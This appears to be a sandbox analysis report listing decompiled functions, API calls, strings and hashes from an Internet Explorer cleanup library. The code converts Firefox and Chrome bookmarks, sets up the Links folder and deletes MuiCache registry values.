</DL><p>, xrefs: 0115450E, 01154526, 01154561
<DL><p>, xrefs: 011544A1, 011544F9, 0115454C
ieframe.dll, xrefs: 011544B9
<DT><H3 FOLDED>%s</H3>, xrefs: 011544EF, 01154542
</DL><p>, xrefs: 0115456C
<!DOCTYPE NETSCAPE-Bookmark-file-, xrefs: 01154473
, xrefs: 01154489
<TITLE>Bookmarks</TITLE><H1>Bookmarks</H1>, xrefs: 01154495

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$CloseCreateFileFreeHandleLoad
String ID: $<!DOCTYPE NETSCAPE-Bookmark-file-$</DL><p>$</DL><p>$<DL><p>$<DT><H3 FOLDED>%s</H3>$<TITLE>Bookmarks</TITLE><H1>Bookmarks</H1>$ieframe.dll
API String ID: 3702922737-715636854
Opcode ID: 9f0f55eb19258373835ae4e12254c96b6fc4c431852f3fda12697ca844a4c5bc
Instruction ID: 7bf2d68dbf93bd9edf50a87a2765331a5992b2ea94a88c73afc96d87b534d51e
Opcode Fuzzy Hash: 9f0f55eb19258373835ae4e12254c96b6fc4c431852f3fda12697ca844a4c5bc
Instruction Fuzzy Hash: 26311471A40305F6D7AD7F716C89BAE7AB8AFA0758F20005DED3592940FF7049C08A26

Uniqueness

Uniqueness Score: -1.00%

Function 01154181, Relevance: 18.2, APIs: 3, Strings: 9, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E01154181(void* __ecx, void* __edx, void* __eflags, long long __fp0) {
				signed int _v8;
				char _v32;
				char _v2060;
				char _v4108;
				long long _v4112;
				void* _v4116;
				WCHAR* _v4120;
				char _v4124;
				WCHAR* _v4128;
				char _v4132;
				WCHAR* _v4140;
				WCHAR* _v4144;
				WCHAR* _v4148;
				char _v4180;
				WCHAR* _v4188;
				WCHAR* _v4192;
				WCHAR* _v4196;
				char _v4228;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				void* _t51;
				void* _t52;
				void* _t54;
				void* _t60;
				void* _t62;
				void* _t69;
				int _t74;
				void* _t85;
				char* _t95;
				void* _t100;
				void* _t102;
				void* _t103;
				void* _t105;
				WCHAR* _t106;
				int _t107;
				signed int _t108;
				long long* _t109;
				void* _t110;
				long long* _t111;
				long long _t120;
				long long _t121;

				_t120 = __fp0;
				_t100 = __edx;
				E01159880(0x1084);
				_t49 =  *0x115a064; // 0xc03c63c6
				_v8 = _t49 ^ _t108;
				 *0x115a3cc =  *0x115a3cc + 1;
				_t102 = __ecx;
				_v4132 = 0;
				_v4128 = 0;
				_t51 = E011532E7(0x115a540);
				_t113 = _t51;
				if(_t51 == 0) {
					L14:
					_v4124 = 0;
					_v4120 = 0;
					_t52 = E011532E7(0x115a540);
					_t116 = _t52;
					if(_t52 == 0) {
						L20:
						 *0x115a3cc =  *0x115a3cc - 1;
						E0115397B( &_v4124, _t118);
						_t54 = E0115397B( &_v4132, _t118);
						_pop(_t103);
						_pop(_t105);
						_pop(_t85);
						return E01159250(_t54, _t85, _v8 ^ _t108, _t100, _t103, _t105);
					}
					E01153280( &_v4108, 0x400, L"select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favicons as i on p.favicon_id=i.id where b.fk=p.id and b.parent=%d", _t102);
					_t110 = _t109 + 0x10;
					_t60 = E01153F2A(0x115a540, _t116,  &_v4108,  &_v4124);
					_t117 = _t60;
					if(_t60 < 0) {
						goto L20;
					}
					_v4196 = 0;
					_v4192 = 0;
					_v4188 = 0;
					while(1) {
						_t62 = E011539AB( &_v4124, _t100, _t117,  &_v4228);
						_t118 = _t62;
						if(_t62 < 0) {
							break;
						}
						_push(_v4196);
						asm("fild qword [ebp-0x1068]");
						_push(_v4188);
						_v4112 = _t120;
						_t121 = _v4112;
						_t111 = _t110 - 0x10;
						_v32 = _t121;
						asm("fild qword [ebp-0x1070]");
						_v4112 = _t121;
						_t120 = _v4112;
						 *_t111 = _t120;
						E011540B5(0, L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" LAST_MODIFIED=\"%.0f\" ICON_URI=\"%s\">%s</A>", _v4192);
						_t110 = _t111 + 0x20;
					}
					E01153FD0(_t62,  &_v4228);
					goto L20;
				}
				E01153280( &_v2060, 0x400, L"select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d", __ecx);
				_t109 = _t109 + 0x10;
				_t69 = E01153F2A(0x115a540, _t113,  &_v2060,  &_v4132);
				_t114 = _t69;
				if(_t69 >= 0) {
					_v4148 = 0;
					_v4144 = 0;
					_v4140 = 0;
					while(1) {
						_t95 =  &_v4132;
						if(E01153A66(_t95, _t100, _t114,  &_v4180) < 0) {
							break;
						}
						_t106 = _v4148;
						__eflags = _t102 - 1;
						if(_t102 != 1) {
							L6:
							__eflags = lstrcmpW(_t106, L"Smart Bookmarks");
							if(__eflags != 0) {
								_v4116 = 0;
								_t74 = E01153DEF(0, __eflags, _v4180,  &_v4116);
								asm("fild qword [ebp-0x1040]");
								_push(_t106);
								__eflags = _t74;
								if(_t74 != 0) {
									_push(_v4116);
									_v4112 = _t120;
									_t120 = _v4112;
									_t107 = _v4116;
									_push(_t95);
									_push(_t95);
									_v32 = _t120;
									E011540B5(0, L"<DT><A HREF=\"%s\" ADD_DATE=\"%.0f\" FEEDURL=\"%s\">%s</A>", _t107);
									_t109 = _t109 + 0x18;
								} else {
									_v4112 = _t120;
									_t120 = _v4112;
									 *_t109 = _t120;
									E011540B5(0, L"<DT><H3 FOLDED ADD_DATE=\"%.0f\">%s</H3>", _t95);
									E011540B5(0, L"<DL><p>", _t95);
									_t109 = _t109 + 0x14;
									E01154181(_v4180, _t100, __eflags, _t120);
									_push(L"</DL><p>");
									E011540B5(0);
									_t107 = _v4116;
								}
								__eflags = _t107;
								if(__eflags != 0) {
									_push(_t107);
									L01158F79();
								}
							}
							continue;
						}
						__eflags = lstrcmpW(_t106, L"Tags");
						if(__eflags == 0) {
							continue;
						}
						__eflags = lstrcmpW(_t106, 0x11519c4);
						if(__eflags == 0) {
							continue;
						}
						goto L6;
					}
					E01153FD0(_t71,  &_v4180);
				}
			}

0x01154181
0x01154181
0x0115418b
0x01154190
0x01154197
0x0115419a
0x011541a5
0x011541ac
0x011541b2
0x011541b8
0x011541bd
0x011541bf
0x0115431c
0x01154321
0x01154327
0x0115432d
0x01154332
0x01154334
0x011543f1
0x011543f1
0x011543fd
0x01154408
0x01154410
0x01154411
0x01154414
0x0115441d
0x0115441d
0x0115434c
0x01154351
0x01154362
0x01154367
0x01154369
0x00000000
0x00000000
0x0115436f
0x01154375
0x0115437b
0x011543d0
0x011543dd
0x011543e2
0x011543e4
0x00000000
0x00000000
0x01154383
0x01154389
0x0115438f
0x01154395
0x0115439b
0x011543a1
0x011543a4
0x011543a8
0x011543ae
0x011543b4
0x011543ba
0x011543c8
0x011543cd
0x011543cd
0x011543ec
0x00000000
0x011543ec
0x011541d7
0x011541dc
0x011541ed
0x011541f2
0x011541f4
0x011541fa
0x01154200
0x01154206
0x011542f7
0x011542fe
0x0115430b
0x00000000
0x00000000
0x01154211
0x01154217
0x0115421a
0x01154244
0x01154250
0x01154252
0x0115425e
0x0115426b
0x01154270
0x01154276
0x01154277
0x01154279
0x011542c1
0x011542c7
0x011542cd
0x011542d3
0x011542d9
0x011542da
0x011542db
0x011542e4
0x011542e9
0x0115427b
0x0115427c
0x01154282
0x01154289
0x01154291
0x0115429b
0x011542a6
0x011542a9
0x011542ae
0x011542b3
0x011542b8
0x011542be
0x011542ec
0x011542ee
0x011542f0
0x011542f1
0x011542f6
0x011542ee
0x00000000
0x01154252
0x01154228
0x0115422a
0x00000000
0x00000000
0x0115423c
0x0115423e
0x00000000
0x00000000
0x00000000
0x0115423e
0x01154317
0x01154317

APIs

Part of subcall function 01153280: _vsnwprintf.MSVCRT ref: 011532B2

lstrcmpW.KERNEL32(?,Tags,?,?), ref: 01154222
lstrcmpW.KERNEL32(?,011519C4), ref: 01154236
lstrcmpW.KERNEL32(?,Smart Bookmarks,?,?), ref: 0115424A

Strings

</DL><p>, xrefs: 011542AE
<DL><p>, xrefs: 01154296
<DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>, xrefs: 0115428C
select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic, xrefs: 0115433B
<DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>, xrefs: 011543C3
<DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>, xrefs: 011542DF
Tags, xrefs: 0115421C
Smart Bookmarks, xrefs: 01154244
select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d, xrefs: 011541C6

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmp$_vsnwprintf
String ID: </DL><p>$<DL><p>$<DT><A HREF="%s" ADD_DATE="%.0f" FEEDURL="%s">%s</A>$<DT><A HREF="%s" ADD_DATE="%.0f" LAST_MODIFIED="%.0f" ICON_URI="%s">%s</A>$<DT><H3 FOLDED ADD_DATE="%.0f">%s</H3>$Smart Bookmarks$Tags$select b.id, b.title, b.dateAdded, b.lastModified from moz_bookmarks as b where b.type=2 and b.parent=%d$select b.id, b.title, p.url, b.dateAdded, b.lastModified, i.url from moz_bookmarks as b, moz_places as p left outer join moz_favic
API String ID: 2721767008-3632509114
Opcode ID: a33a45286f016904bdfd722bd61b5ad76dcde8f8a4770d7bc0234dca3ac2f191
Instruction ID: bec6417cb67f0a7d19b7a1fc3d08ac70259dec54236ce30886e073a3e0a72bd0
Opcode Fuzzy Hash: a33a45286f016904bdfd722bd61b5ad76dcde8f8a4770d7bc0234dca3ac2f191
Instruction Fuzzy Hash: 7B51B771D00269EBDBA9AF55DC44AEEB778BF04384F4001D9EDB9A2044EBB05AD08F61

Uniqueness

Uniqueness Score: -1.00%

Function 011556A6, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 153
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E011556A6(WCHAR* __ecx, void* __eflags) {
				char _v8;
				long _v12;
				struct _OVERLAPPED* _v20;
				struct _OVERLAPPED* _v24;
				void* _v32;
				int _v40;
				void* __edi;
				void* _t30;
				int _t62;
				void* _t79;
				void* _t81;
				long _t83;
				void* _t100;

				_push(_t79);
				_t83 = 0;
				if(E011532E7(0x115a7a8) == 0) {
					L25:
					return _t83;
				}
				_t30 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				 *0x115a06c = _t30;
				_t89 = _t30 - 0xffffffff;
				if(_t30 != 0xffffffff) {
					E0115477D( &_v40);
					_t83 = E011547B1( &_v40, _t79, _t89);
					if(_t83 >= 0) {
						_t83 = E01154831( &_v40, _t79, L"roots");
						_t91 = _t83;
						if(_t83 >= 0) {
							_t83 = E011547B1( &_v40, _t79, _t91);
							if(_t83 >= 0) {
								_t83 = E01154831( &_v40, _t79, L"bookmark_bar");
								_t93 = _t83;
								if(_t83 >= 0) {
									_t83 = E011547B1( &_v40, _t79, _t93);
									if(_t83 >= 0) {
										_t83 = E011554E0(0,  &_v40);
										if(_t83 >= 0) {
											_t83 = E011552E9( &_v40,  &_v40, L"name", L"Bookmarks bar");
											_t96 = _t83;
											if(_t83 >= 0) {
												_t83 = E011547D1( &_v40, _t96);
												_t97 = _t83;
												if(_t83 >= 0) {
													_t83 = E011547D1( &_v40, _t97);
													if(_t83 >= 0) {
														if(_t100 >= 0) {
															_t83 = E011547D1( &_v40, _t100);
															if(_t83 >= 0) {
																_v8 = 0;
																_t81 = 0;
																_t83 = E0115503F( &_v32, 0);
																if(_t83 >= 0) {
																	_t81 = _v32;
																	_v32 = 0;
																	_v24 = 0;
																	_v20 = 0;
																	_t83 = E011545A4(_t81,  &_v8);
																	if(_t83 >= 0) {
																		_v12 = 0;
																		if(WriteFile( *0x115a06c, _t81, _v8 + _v8,  &_v12, 0) == 0) {
																			_t83 = GetLastError();
																		}
																	}
																}
																if(_t81 != 0) {
																	__imp__CoTaskMemFree(_t81);
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
					_t33 = CloseHandle( *0x115a06c);
					while(1) {
						_t62 = _v40;
						if(_t62 == 0) {
							break;
						}
						_t33 =  *(_t62 + 4);
						_push(_t62);
						_v40 =  *(_t62 + 4);
						L01158F79();
					}
					E011548E1(_t33,  &_v32);
				}
			}

0x011556b9
0x011556ba
0x011556c3
0x01155873
0x0115587b
0x0115587b
0x011556d9
0x011556df
0x011556e4
0x011556e7
0x011556f0
0x011556fd
0x01155701
0x01155714
0x01155716
0x01155718
0x01155726
0x0115572a
0x0115573d
0x0115573f
0x01155741
0x0115574f
0x01155753
0x01155763
0x01155767
0x0115577f
0x01155781
0x01155783
0x01155791
0x01155793
0x01155795
0x011557a3
0x011557a7
0x011557d7
0x011557e1
0x011557e5
0x011557ea
0x011557ed
0x011557f4
0x011557f8
0x011557fa
0x01155803
0x01155806
0x01155809
0x01155811
0x01155815
0x0115581b
0x01155834
0x0115583c
0x0115583c
0x01155834
0x01155815
0x01155840
0x01155843
0x01155843
0x01155840
0x011557e5
0x011557d7
0x011557a7
0x01155795
0x01155783
0x01155767
0x01155753
0x01155741
0x0115572a
0x01155718
0x0115584f
0x01155864
0x01155864
0x01155869
0x00000000
0x00000000
0x01155857
0x0115585a
0x0115585b
0x0115585e
0x01155863
0x0115586e
0x0115586e

APIs

CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 011556D9
WriteFile.KERNEL32(?,?,?,00000000,name,Bookmarks bar,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0115582C
GetLastError.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01155836
CoTaskMemFree.OLE32(00000000,name,Bookmarks bar,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 01155843
CloseHandle.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0115584F

Strings

Bookmarks bar, xrefs: 0115576D
roots, xrefs: 01155707
name, xrefs: 01155772
version, xrefs: 011557AD
bookmark_bar, xrefs: 01155730

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseCreateErrorFreeHandleLastTaskWrite
String ID: Bookmarks bar$bookmark_bar$name$roots$version
API String ID: 3460811019-817887258
Opcode ID: 5bc4f4cd3d34acf26a06a2f1def91ed9ed9c2d43e862b99768f9c838006337cd
Instruction ID: 22ba0077676bd128db5fd34ebd43981c6f483de4ed74a7aab49937b7b34f6277
Opcode Fuzzy Hash: 5bc4f4cd3d34acf26a06a2f1def91ed9ed9c2d43e862b99768f9c838006337cd
Instruction Fuzzy Hash: 1541D432D00626DBC7EEEAA5C851AEEBAB5AF14758B110168DD31B7240EB31DD40C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01155DFA, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E01155DFA(intOrPtr __ecx, char* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v528;
				intOrPtr _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t11;
				char* _t13;
				char* _t14;
				void* _t20;
				intOrPtr _t24;
				void* _t31;
				signed int _t33;

				_t30 = __edx;
				_t11 =  *0x115a064; // 0xc03c63c6
				_v8 = _t11 ^ _t33;
				_t24 = _a4;
				_t13 =  &_v528;
				_t31 = 0;
				_v532 = __ecx;
				__imp__SHGetFolderPathAndSubDirW(0, 6, 0, 0, L"Links", _t13);
				_t32 = _t13;
				if(_t13 < 0) {
					_t14 =  &_v528;
					__imp__SHGetFolderPathAndSubDirW(0, 0x8006, 0, 0, L"Links", _t14);
					_t32 = _t14;
					if(_t14 < 0) {
						L14:
						return E01159250(_t32, _t24, _v8 ^ _t33, _t30, _t31, _t32);
					}
					__imp__SHSetLocalizedName( &_v528, L"%windir%\\System32\\ieframe.dll", 0x3061);
					E01156275(__edx);
					L12:
					if(_t24 != 0) {
						_t30 = 0x104;
						_t32 = E0115379D(_t24, 0x104, L"Links");
					}
					goto L14;
				}
				__imp__#672( *0x115100c);
				if(_t13 != 0) {
					__imp__SHSetLocalizedName( &_v528, L"%windir%\\System32\\ieframe.dll", 0x3061);
					E01156275(__edx);
					__imp__#675( *0x115100c);
				}
				_t20 = E01156422();
				_t31 = _t20;
				if(_t31 == 1) {
					L8:
					__imp__#672( *0x1151008);
					if(_t20 != 0) {
						_t30 =  &_v528;
						E01156106(_v532,  &_v528);
						__imp__#675( *0x1151008);
					}
					goto L12;
				}
				_t20 = E01156422();
				if(_t20 == 0xf || _t20 == 0x10 || _t20 == 0x18 || _t31 == 0x12) {
					goto L8;
				} else {
					goto L12;
				}
			}

0x01155dfa
0x01155e05
0x01155e0c
0x01155e10
0x01155e13
0x01155e21
0x01155e23
0x01155e2e
0x01155e34
0x01155e38
0x01155eca
0x01155ede
0x01155ee4
0x01155ee8
0x01155f1d
0x01155f2f
0x01155f2f
0x01155efb
0x01155f01
0x01155f06
0x01155f08
0x01155f0f
0x01155f1b
0x01155f1b
0x00000000
0x01155f08
0x01155e44
0x01155e4c
0x01155e5f
0x01155e65
0x01155e70
0x01155e70
0x01155e76
0x01155e7b
0x01155e80
0x01155e9b
0x01155ea1
0x01155ea9
0x01155eb1
0x01155eb7
0x01155ec2
0x01155ec2
0x00000000
0x01155ea9
0x01155e82
0x01155e8a
0x00000000
0x00000000
0x00000000
0x00000000

APIs

SHGetFolderPathAndSubDirW.SHELL32(00000000,00000006,00000000,00000000,Links,?,00000000,?,00000000), ref: 01155E2E
#672.IERTUTIL(?,00000000), ref: 01155E44
#675.IERTUTIL(?,00000000), ref: 01155E70
SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 01155E5F

Part of subcall function 01156275: RegOpenKeyExW.ADVAPI32(80000001,01152240,00000000,00020006,?,00000000,00000000,011544DB), ref: 011562C1
Part of subcall function 01156275: RegDeleteValueW.ADVAPI32(?,011522D8), ref: 011562E4
Part of subcall function 01156275: RegDeleteValueW.ADVAPI32(?,?), ref: 01156339
Part of subcall function 01156275: RegCloseKey.ADVAPI32(?), ref: 01156372

#672.IERTUTIL(?,00000000), ref: 01155EA1
#675.IERTUTIL(?,00000000), ref: 01155EC2
SHGetFolderPathAndSubDirW.SHELL32(00000000,00008006,00000000,00000000,Links,?,?,00000000), ref: 01155EDE
SHSetLocalizedName.SHELL32(?,%windir%\System32\ieframe.dll,00003061), ref: 01155EFB

Strings

Links, xrefs: 01155E1C, 01155ED1, 01155F0A
%windir%\System32\ieframe.dll, xrefs: 01155E53, 01155EEF

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: #672#675DeleteFolderLocalizedNamePathValue$CloseOpen
String ID: %windir%\System32\ieframe.dll$Links
API String ID: 4100310970-3729751556
Opcode ID: 0a0936eba08b505dd929f7c2d82101a6666471c859db0b8d664b557d038097fa
Instruction ID: 5afb92cdfd9b7a5a1df332485ccd3a6b4ef7599e7c52fd31d958d4da355b0180
Opcode Fuzzy Hash: 0a0936eba08b505dd929f7c2d82101a6666471c859db0b8d664b557d038097fa
Instruction Fuzzy Hash: 0F31D431A00314EBDBBD9B29EC89E6E7B7AEB81740F504175FE3696154DB708980DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0115748E, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0115748E(void* __ecx, intOrPtr* __edx) {
				void* _v0;
				long _v8;
				long _v12;
				long _t11;
				long _t18;
				void* _t27;
				intOrPtr* _t40;
				void* _t41;

				_t27 = __ecx;
				_t41 = __ecx;
				_t40 = __edx;
				_t11 = WaitForSingleObject(__ecx, 0);
				if(_t11 != 0xffffffff) {
					if(_t11 == 0 || _t11 == 0x102) {
						_v8 = 0;
						if(_t11 != 0) {
							_v12 = 0;
							if(ReleaseSemaphore(_t41, 1,  &_v12) != 0) {
								if(_v12 == 0) {
									if(ReleaseSemaphore(_t41, 1, 0) != 0 || GetLastError() != 0x12a) {
										goto L24;
									} else {
										_t18 = WaitForSingleObject(_t41, 0);
										if(_t18 != 0xffffffff) {
											if(_t18 == 0) {
												L22:
												 *_t40 = _v8;
												return 0;
											}
											goto L24;
										}
										L2:
										return E01157347("wil");
									}
								}
								goto L24;
							}
							goto L2;
						}
						if(ReleaseSemaphore(_t41, 1,  &_v8) != 0) {
							_v8 = _v8 + 1;
							if(ReleaseSemaphore(_t41, 1, 0) != 0 || GetLastError() != 0x12a) {
								goto L24;
							} else {
								goto L22;
							}
						}
						goto L2;
					} else {
						L24:
						E01157328(_t27, 0x8000ffff);
						return 0x8000ffff;
					}
				}
				goto L2;
			}

0x0115748e
0x0115749b
0x0115749f
0x011574a1
0x011574aa
0x011574c5
0x011574d8
0x011574dd
0x0115751f
0x0115752e
0x0115753d
0x01157552
0x00000000
0x01157561
0x01157563
0x0115756c
0x0115757a
0x01157583
0x01157586
0x00000000
0x01157588
0x00000000
0x0115757c
0x011574b1
0x00000000
0x011574b9
0x01157552
0x00000000
0x0115753f
0x00000000
0x01157530
0x011574ee
0x011574f7
0x01157506
0x00000000
0x00000000
0x00000000
0x00000000
0x01157506
0x00000000
0x011574ce
0x01157591
0x0115759b
0x00000000
0x011575a0
0x011574c5
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,?), ref: 011574A1

Strings

wil, xrefs: 011574B4

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: d18cfb7b955a9d91e092f71da2e25b1e8b7a5594e71a9283df6bcc09282fa920
Instruction ID: eb9b6bc475facefa60251ebea008548e5657c726584e4ded0c2996b14d2b0904
Opcode Fuzzy Hash: d18cfb7b955a9d91e092f71da2e25b1e8b7a5594e71a9283df6bcc09282fa920
Instruction Fuzzy Hash: 7631E130624344EBEBAC5A699886BBF3A6AEF41358FE04031FD36C65C1E774CD418762

Uniqueness

Uniqueness Score: -1.00%

Function 01156275, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88
registryCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E01156275(short* __edx) {
				signed int _v8;
				short _v528;
				void* _v532;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				long _t30;
				long _t35;
				void* _t38;
				char* _t39;
				int _t46;
				signed int _t47;
				void* _t48;

				_t44 = __edx;
				_t22 =  *0x115a064; // 0xc03c63c6
				_v8 = _t22 ^ _t47;
				_push(L"[IECleanup LIB] CleanupMuiCache()");
				_push(0);
				E011566D1(_t38);
				_pop(_t41);
				_t46 = 0;
				_t39 = L"[IECleanup LIB] CleanupMuiCache() - Successfully deleted \'%s\'";
				do {
					_v532 = 0;
					_t4 = _t46 + 0x115a030; // 0x1152240
					if(RegOpenKeyExW(0x80000001,  *_t4, 0, 0x20006,  &_v532) != 0) {
						goto L11;
					}
					if(( *(_t46 + 0x115a038) & 0x00000001) != 0) {
						_t8 = _t46 + 0x115a034; // 0x11522d8
						_t35 = RegDeleteValueW(_v532,  *_t8);
						_t10 = _t46 + 0x115a034; // 0x11522d8
						_t41 =  *_t10;
						if(_t35 != 0) {
							_push(_t35);
							E011566D1(_t39, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d", _t41);
							_t48 = _t48 + 0x10;
						} else {
							E011566D1(_t39, 0, _t39, _t41);
							_t48 = _t48 + 0xc;
						}
					}
					if(( *(_t46 + 0x115a038) & 0x00000002) != 0) {
						_t14 = _t46 + 0x115a034; // 0x11522d8
						_t41 =  *_t14;
						_t44 =  &_v528;
						E01158EDB( *_t14,  &_v528,  *_t14);
						_t30 = RegDeleteValueW(_v532,  &_v528);
						if(_t30 != 0) {
							_push(_t30);
							E011566D1(_t39, 0, L"[IECleanup LIB] CleanupMuiCache() - Unable to delete \'%s\', Result=%d",  &_v528);
							_t48 = _t48 + 0x10;
						} else {
							E011566D1(_t39, 0, _t39,  &_v528);
							_t48 = _t48 + 0xc;
						}
					}
					_t26 = RegCloseKey(_v532);
					L11:
					_t46 = _t46 + 0xc;
				} while (_t46 < 0x24);
				return E01159250(_t26, _t39, _v8 ^ _t47, _t44, 0, _t46);
			}

0x01156275
0x01156280
0x01156287
0x0115628f
0x01156294
0x01156295
0x0115629b
0x0115629c
0x0115629e
0x011562a3
0x011562a9
0x011562b6
0x011562c9
0x00000000
0x00000000
0x011562d6
0x011562d8
0x011562e4
0x011562ea
0x011562ea
0x011562f2
0x01156301
0x01156309
0x0115630e
0x011562f4
0x011562f7
0x011562fc
0x011562fc
0x011562f2
0x01156318
0x0115631b
0x0115631b
0x01156321
0x01156327
0x01156339
0x01156341
0x01156356
0x01156364
0x01156369
0x01156343
0x0115634c
0x01156351
0x01156351
0x01156341
0x01156372
0x01156378
0x01156378
0x0115637b
0x01156394

APIs

Part of subcall function 011566D1: DecodePointer.KERNEL32(00000000,00000000), ref: 0115674D

RegOpenKeyExW.ADVAPI32(80000001,01152240,00000000,00020006,?,00000000,00000000,011544DB), ref: 011562C1
RegDeleteValueW.ADVAPI32(?,011522D8), ref: 011562E4
RegDeleteValueW.ADVAPI32(?,?), ref: 01156339
RegCloseKey.ADVAPI32(?), ref: 01156372

Strings

[IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d, xrefs: 01156303, 0115635E
[IECleanup LIB] CleanupMuiCache(), xrefs: 0115628F
[IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s', xrefs: 0115629E, 011562F5, 0115634A

Memory Dump Source

Source File: 00000005.00000002.667280307.0000000001151000.00000020.00020000.sdmp, Offset: 01150000, based on PE: true

Associated: 00000005.00000002.667276136.0000000001150000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.667289439.000000000115A000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.667293879.000000000115B000.00000002.00020000.sdmp Download File

Similarity

API ID: DeleteValue$CloseDecodeOpenPointer
String ID: [IECleanup LIB] CleanupMuiCache()$[IECleanup LIB] CleanupMuiCache() - Successfully deleted '%s'$[IECleanup LIB] CleanupMuiCache() - Unable to delete '%s', Result=%d
API String ID: 2742595093-2876198904
Opcode ID: 035fb6ef2169e2b6b82827b77b7282d2ec9b2c02de9b99df36fd5c2be4a6573e
Instruction ID: bc1fbc8b89ed52cf4f3857c080190d09a08202a956ba43ea5fa2dbdae0cb6c21
Opcode Fuzzy Hash: 035fb6ef2169e2b6b82827b77b7282d2ec9b2c02de9b99df36fd5c2be4a6573e
Instruction Fuzzy Hash: 8C21E571954218EBD7AC5B15DC88EBFBB7DEF50204F400199ED3E92001EB711984CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 01156106, Relevance: 7.6, APIs: 5, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E01156106(struct HINSTANCE__* __ecx, WCHAR* __edx) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				WCHAR* _v1572;
				intOrPtr _v1576;
				struct HINSTANCE__* _v1580;
				signed int _v1584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t27;
				int _t30;
				int _t35;
				intOrPtr _t36;
				struct _SECURITY_ATTRIBUTES* _t38;
				intOrPtr _t47;
				WCHAR* _t48;
				intOrPtr _t49;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t51;
				struct HINSTANCE__* _t60;
				int _t61;
				void* _t62;
				void* _t63;
				signed int _t64;
				int _t65;
				signed int _t66;

				_t59 = __edx;
				_t27 =  *0x115a064; // 0xc03c63c6
				_v8 = _t27 ^ _t66;
				_t60 = __ecx;
				_t48 = __edx;
				_v1580 = __ecx;
				_v1572 = __edx;
				_t30 = LoadStringW(__ecx, 0x5601,  &_v1048, 0x104);
				_t67 = _t30;
				if(_t30 == 0) {
					_t49 = 0x80004005;
					_v1576 = 0x80004005;
				} else {
					_t59 =  &_v528;
					_t47 = E01155F32(_t48, _t48,  &_v528, _t67,  &_v1048);
					_t49 = _t47;
